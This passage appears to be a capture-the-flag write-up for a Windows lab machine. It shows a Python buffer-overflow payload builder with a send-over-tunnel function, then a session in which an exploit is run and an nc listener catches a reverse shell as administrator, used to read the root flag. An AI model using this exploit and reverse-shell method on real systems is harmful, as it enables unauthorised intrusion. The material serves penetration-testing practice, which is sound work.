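    for name, part in (("ret_addr", ret), ("shellcode", shellcode)):
        hits = check_bad_chars(part, bad)
        if hits:
            raise ValueError(f"{name} contains bad bytes at {hits[:3]}")
    return b"A" * offset + ret + b"\x90" * nops + shellcode


def send_payload(payload, host="127.0.0.1", port=8888, timeout=5):
    """Deliver the payload to the forwarded port (chisel R:8888 -> target's localhost:8888)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.send(payload)


if __name__ == "__main__":
    # Placeholders: replace with the offset and return address from 48389.py and the
    # `payload` variable produced by the msfvenom command above.
    OFFSET = 1052            # assumption, not taken from the script
    JMP_ESP = 0xDEADBEEF     # assumption, obviously fake
    shellcode = b"\xcc" * 8  # stand-in for the msfvenom output
    buf = build_payload(OFFSET, JMP_ESP, shellcode)
    print(f"payload length {len(buf)} bytes, bad bytes: {check_bad_chars(buf)}")
    # send_payload(buf)  # uncomment once the tunnel is up and nc is listening
```

Run it once with the real values from the script and the msfvenom output pasted in; if it raises, the bad-character set or the chosen gadget address needs another look before anything is sent.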

Shell:

Now I just run the exploit through the tunnel with nc already waiting (start the listener first; the script works under either legacy Python or Python 3):

┌──(kali💀kali)-[~/Desktop]
└─$ sudo python ./48389.py   
┌──(kali💀kali)-[~]
└─$ rlwrap nc -lnvp 2560
listening on [any] 2560 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.198] 50456
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
df96a65b------------------------------
